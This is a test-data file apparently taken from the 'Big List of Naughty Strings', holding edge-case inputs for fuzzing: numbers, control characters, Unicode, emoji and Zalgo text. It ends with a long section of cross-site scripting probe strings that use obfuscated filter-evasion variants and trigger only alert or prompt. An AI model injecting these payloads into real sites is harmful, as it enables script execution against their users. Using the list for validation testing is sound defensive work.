|  | # sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt | 
|  |  | 
|  | #	Reserved Strings | 
|  | # | 
|  | #	Strings which may be used elsewhere in code | 
|  |  | 
|  | undefined | 
|  | undef | 
|  | null | 
|  | NULL | 
|  | (null) | 
|  | nil | 
|  | NIL | 
|  | true | 
|  | false | 
|  | True | 
|  | False | 
|  | TRUE | 
|  | FALSE | 
|  | None | 
|  | hasOwnProperty | 
|  | \ | 
|  | \\ | 
|  |  | 
|  | #	Numeric Strings | 
|  | # | 
|  | #	Strings which can be interpreted as numeric | 
|  |  | 
|  | 0 | 
|  | 1 | 
|  | 1.00 | 
|  | $1.00 | 
|  | 1/2 | 
|  | 1E2 | 
|  | 1E02 | 
|  | 1E+02 | 
|  | -1 | 
|  | -1.00 | 
|  | -$1.00 | 
|  | -1/2 | 
|  | -1E2 | 
|  | -1E02 | 
|  | -1E+02 | 
|  | 1/0 | 
|  | 0/0 | 
|  | -2147483648/-1 | 
|  | -9223372036854775808/-1 | 
|  | -0 | 
|  | -0.0 | 
|  | +0 | 
|  | +0.0 | 
|  | 0.00 | 
|  | 0..0 | 
|  | . | 
|  | 0.0.0 | 
|  | 0,00 | 
|  | 0,,0 | 
|  | , | 
|  | 0,0,0 | 
|  | 0.0/0 | 
|  | 1.0/0.0 | 
|  | 0.0/0.0 | 
|  | 1,0/0,0 | 
|  | 0,0/0,0 | 
|  | --1 | 
|  | - | 
|  | -. | 
|  | -, | 
|  | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 | 
|  | NaN | 
|  | Infinity | 
|  | -Infinity | 
|  | INF | 
|  | 1#INF | 
|  | -1#IND | 
|  | 1#QNAN | 
|  | 1#SNAN | 
|  | 1#IND | 
|  | 0x0 | 
|  | 0xffffffff | 
|  | 0xffffffffffffffff | 
|  | 0xabad1dea | 
|  | 123456789012345678901234567890123456789 | 
|  | 1,000.00 | 
|  | 1 000.00 | 
|  | 1'000.00 | 
|  | 1,000,000.00 | 
|  | 1 000 000.00 | 
|  | 1'000'000.00 | 
|  | 1.000,00 | 
|  | 1 000,00 | 
|  | 1'000,00 | 
|  | 1.000.000,00 | 
|  | 1 000 000,00 | 
|  | 1'000'000,00 | 
|  | 01000 | 
|  | 08 | 
|  | 09 | 
|  | 2.2250738585072011e-308 | 
|  |  | 
|  | #	Special Characters | 
|  | # | 
|  | # ASCII punctuation.  All of these characters may need to be escaped in some | 
|  | # contexts.  Divided into three groups based on (US-layout) keyboard position. | 
|  |  | 
|  | ,./;'[]\-= | 
|  | <>?:"{}|_+ | 
|  | !@#$%^&*()`~ | 
|  |  | 
|  | # Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, | 
|  | # and U+007F (DEL) | 
|  | # Often forbidden to appear in various text-based file formats (e.g. XML), | 
|  | # or reused for internal delimiters on the theory that they should never | 
|  | # appear in input. | 
|  | # The next line may appear to be blank or mojibake in some viewers. | 
|  |  | 
|  |  | 
|  | # Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. | 
|  | # Commonly misinterpreted as additional graphic characters. | 
|  | # The next line may appear to be blank, mojibake, or dingbats in some viewers. | 
|  |  | 
|  |  | 
|  | # Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode | 
|  | # version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), | 
|  | # and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often | 
|  | # treated as whitespace in some contexts. | 
|  | # This file unfortunately cannot express strings containing | 
|  | # U+0000, U+000A, or U+000D (NUL, LF, CR). | 
|  | # The next line may appear to be blank or mojibake in some viewers. | 
|  | # The next line may be flagged for "trailing whitespace" in some viewers. | 
|  |  | 
|  |  | 
|  | # Unicode additional control characters: all of the characters with | 
|  | # general category Cf (in Unicode 8.0.0). | 
|  | # The next line may appear to be blank or mojibake in some viewers. | 
|  |  | 
|  |  | 
|  | # "Byte order marks", U+FEFF and U+FFFE, each on its own line. | 
|  | # The next two lines may appear to be blank or mojibake in some viewers. | 
|  |  | 
|  |  | 
|  |  | 
|  | #	Unicode Symbols | 
|  | # | 
|  | #	Strings which contain common unicode symbols (e.g. smart quotes) | 
|  |  | 
|  | Ω≈ç√∫˜µ≤≥÷ | 
|  | åß∂ƒ©˙∆˚¬…æ | 
|  | œ∑´®†¥¨ˆøπ“‘ | 
|  | ¡™£¢∞§¶•ªº–≠ | 
|  | ¸˛Ç◊ı˜Â¯˘¿ | 
|  | ÅÍÎÏ˝ÓÔÒÚÆ☃ | 
|  | Œ„´‰ˇÁ¨ˆØ∏”’ | 
|  | `⁄€‹›fifl‡°·‚—± | 
|  | ⅛⅜⅝⅞ | 
|  | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя | 
|  | ٠١٢٣٤٥٦٧٨٩ | 
|  |  | 
|  | #	Unicode Subscript/Superscript/Accents | 
|  | # | 
|  | #	Strings which contain unicode subscripts/superscripts; can cause rendering issues | 
|  |  | 
|  | ⁰⁴⁵ | 
|  | ₀₁₂ | 
|  | ⁰⁴⁵₀₁₂ | 
|  | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ | 
|  |  | 
|  | #	Quotation Marks | 
|  | # | 
|  | #	Strings which contain misplaced quotation marks; can cause encoding errors | 
|  |  | 
|  | ' | 
|  | " | 
|  | '' | 
|  | "" | 
|  | '"' | 
|  | "''''"'" | 
|  | "'"'"''''" | 
|  | <foo val=“bar” /> | 
|  | <foo val=“bar” /> | 
|  | <foo val=”bar“ /> | 
|  | <foo val=`bar' /> | 
|  |  | 
|  | #	Two-Byte Characters | 
|  | # | 
|  | #	Strings which contain two-byte characters: can cause rendering issues or character-length issues | 
|  |  | 
|  | 田中さんにあげて下さい | 
|  | パーティーへ行かないか | 
|  | 和製漢語 | 
|  | 部落格 | 
|  | 사회과학원 어학연구소 | 
|  | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 | 
|  | 社會科學院語學研究所 | 
|  | 울란바토르 | 
|  | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 | 
|  |  | 
|  | #	Changing length when lowercased | 
|  | # | 
|  | #	Characters which increase in length (2 to 3 bytes) when lowercased | 
|  | #	Credit: https://twitter.com/jifa/status/625776454479970304 | 
|  |  | 
|  | Ⱥ | 
|  | Ⱦ | 
|  |  | 
|  | #	Japanese Emoticons | 
|  | # | 
|  | #	Strings which consist of Japanese-style emoticons which are popular on the web | 
|  |  | 
|  | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ | 
|  | (。◕ ∀ ◕。) | 
|  | `ィ(´∀`∩ | 
|  | __ロ(,_,*) | 
|  | ・( ̄∀ ̄)・:*: | 
|  | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ | 
|  | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ | 
|  | (╯°□°)╯︵ ┻━┻) | 
|  | (ノಥ益ಥ)ノ ┻━┻ | 
|  | ┬─┬ノ( º _ ºノ) | 
|  | ( ͡° ͜ʖ ͡°) | 
|  |  | 
|  | #	Emoji | 
|  | # | 
|  | #	Strings which contain Emoji; should be the same behavior as two-byte characters, but not always | 
|  |  | 
|  | 😍 | 
|  | 👩🏽 | 
|  | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 | 
|  | 🐵 🙈 🙉 🙊 | 
|  | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 | 
|  | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 | 
|  | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 | 
|  | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 | 
|  |  | 
|  | #	Regional Indicator Symbols | 
|  | # | 
|  | #	Regional Indicator Symbols can be displayed differently across | 
|  | #	fonts, and have a number of special behaviors | 
|  |  | 
|  | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 | 
|  | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 | 
|  | 🇺🇸🇷🇺🇸🇦 | 
|  |  | 
|  | #	Unicode Numbers | 
|  | # | 
|  | #	Strings which contain unicode numbers; if the code is localized, it should see the input as numeric | 
|  |  | 
|  | 123 | 
|  | ١٢٣ | 
|  |  | 
|  | #	Right-To-Left Strings | 
|  | # | 
|  | #	Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) | 
|  |  | 
|  | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. | 
|  | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ | 
|  | הָיְתָהtestالصفحات التّحول | 
|  | ﷽ | 
|  | ﷺ | 
|  | مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، | 
|  |  | 
|  | #	Trick Unicode | 
|  | # | 
|  | #	Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) | 
|  |  | 
|  | test | 
|  | test | 
|  | test | 
|  | testtest | 
|  | test | 
|  |  | 
|  | #	Zalgo Text | 
|  | # | 
|  | #	Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) | 
|  |  | 
|  | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ | 
|  | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ | 
|  | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ | 
|  | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ | 
|  | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ | 
|  |  | 
|  | #	Unicode Upsidedown | 
|  | # | 
|  | #	Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) | 
|  |  | 
|  | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ | 
|  | 00˙Ɩ$- | 
|  |  | 
|  | #	Unicode font | 
|  | # | 
|  | #	Strings which contain bold/italic/etc. versions of normal characters | 
|  |  | 
|  | The quick brown fox jumps over the lazy dog | 
|  | 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 | 
|  | 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 | 
|  | 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 | 
|  | 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 | 
|  | 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 | 
|  | 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 | 
|  | ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ | 
|  |  | 
|  | #	Script Injection | 
|  | # | 
|  | #	Strings which attempt to invoke a benign script injection; shows vulnerability to XSS | 
|  |  | 
|  | <script>alert(123)</script> | 
|  | <script>alert('123');</script> | 
|  | <img src=x onerror=alert(123) /> | 
|  | <svg><script>123<1>alert(123)</script> | 
|  | "><script>alert(123)</script> | 
|  | '><script>alert(123)</script> | 
|  | ><script>alert(123)</script> | 
|  | </script><script>alert(123)</script> | 
|  | < / script >< script >alert(123)< / script > | 
|  | onfocus=JaVaSCript:alert(123) autofocus | 
|  | " onfocus=JaVaSCript:alert(123) autofocus | 
|  | ' onfocus=JaVaSCript:alert(123) autofocus | 
|  | <script>alert(123)</script> | 
|  | <sc<script>ript>alert(123)</sc</script>ript> | 
|  | --><script>alert(123)</script> | 
|  | ";alert(123);t=" | 
|  | ';alert(123);t=' | 
|  | JavaSCript:alert(123) | 
|  | ;alert(123); | 
|  | src=JaVaSCript:prompt(132) | 
|  | "><script>alert(123);</script x=" | 
|  | '><script>alert(123);</script x=' | 
|  | ><script>alert(123);</script x= | 
|  | " autofocus onkeyup="javascript:alert(123) | 
|  | ' autofocus onkeyup='javascript:alert(123) | 
|  | <script\x20type="text/javascript">javascript:alert(1);</script> | 
|  | <script\x3Etype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x0Dtype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x09type="text/javascript">javascript:alert(1);</script> | 
|  | <script\x0Ctype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x2Ftype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x0Atype="text/javascript">javascript:alert(1);</script> | 
|  | '`"><\x3Cscript>javascript:alert(1)</script> | 
|  | '`"><\x00script>javascript:alert(1)</script> | 
|  | ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | 
|  | ABC<div style="x:expression\x00(javascript:alert(1)">DEF | 
|  | ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x09expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x20expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x00expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | 
|  | <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x22onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x09onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x00onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x27onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x20onerror=javascript:alert(1)> | 
|  | "`'><script>\x3Bjavascript:alert(1)</script> | 
|  | "`'><script>\x0Djavascript:alert(1)</script> | 
|  | "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x81javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x84javascript:alert(1)</script> | 
|  | "`'><script>\xE3\x80\x80javascript:alert(1)</script> | 
|  | "`'><script>\x09javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x89javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x85javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x88javascript:alert(1)</script> | 
|  | "`'><script>\x00javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\xA8javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | 
|  | "`'><script>\xE1\x9A\x80javascript:alert(1)</script> | 
|  | "`'><script>\x0Cjavascript:alert(1)</script> | 
|  | "`'><script>\x2Bjavascript:alert(1)</script> | 
|  | "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | 
|  | "`'><script>-javascript:alert(1)</script> | 
|  | "`'><script>\x0Ajavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | 
|  | "`'><script>\x7Ejavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x87javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\xA9javascript:alert(1)</script> | 
|  | "`'><script>\xC2\x85javascript:alert(1)</script> | 
|  | "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x83javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | 
|  | "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x80javascript:alert(1)</script> | 
|  | "`'><script>\x21javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x82javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x86javascript:alert(1)</script> | 
|  | "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | 
|  | "`'><script>\x0Bjavascript:alert(1)</script> | 
|  | "`'><script>\x20javascript:alert(1)</script> | 
|  | "`'><script>\xC2\xA0javascript:alert(1)</script> | 
|  | <img \x00src=x onerror="alert(1)"> | 
|  | <img \x47src=x onerror="javascript:alert(1)"> | 
|  | <img \x11src=x onerror="javascript:alert(1)"> | 
|  | <img \x12src=x onerror="javascript:alert(1)"> | 
|  | <img\x47src=x onerror="javascript:alert(1)"> | 
|  | <img\x10src=x onerror="javascript:alert(1)"> | 
|  | <img\x13src=x onerror="javascript:alert(1)"> | 
|  | <img\x32src=x onerror="javascript:alert(1)"> | 
|  | <img\x47src=x onerror="javascript:alert(1)"> | 
|  | <img\x11src=x onerror="javascript:alert(1)"> | 
|  | <img \x47src=x onerror="javascript:alert(1)"> | 
|  | <img \x34src=x onerror="javascript:alert(1)"> | 
|  | <img \x39src=x onerror="javascript:alert(1)"> | 
|  | <img \x00src=x onerror="javascript:alert(1)"> | 
|  | <img src\x09=x onerror="javascript:alert(1)"> | 
|  | <img src\x10=x onerror="javascript:alert(1)"> | 
|  | <img src\x13=x onerror="javascript:alert(1)"> | 
|  | <img src\x32=x onerror="javascript:alert(1)"> | 
|  | <img src\x12=x onerror="javascript:alert(1)"> | 
|  | <img src\x11=x onerror="javascript:alert(1)"> | 
|  | <img src\x00=x onerror="javascript:alert(1)"> | 
|  | <img src\x47=x onerror="javascript:alert(1)"> | 
|  | <img src=x\x09onerror="javascript:alert(1)"> | 
|  | <img src=x\x10onerror="javascript:alert(1)"> | 
|  | <img src=x\x11onerror="javascript:alert(1)"> | 
|  | <img src=x\x12onerror="javascript:alert(1)"> | 
|  | <img src=x\x13onerror="javascript:alert(1)"> | 
|  | <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | 
|  | <img src=x onerror=\x09"javascript:alert(1)"> | 
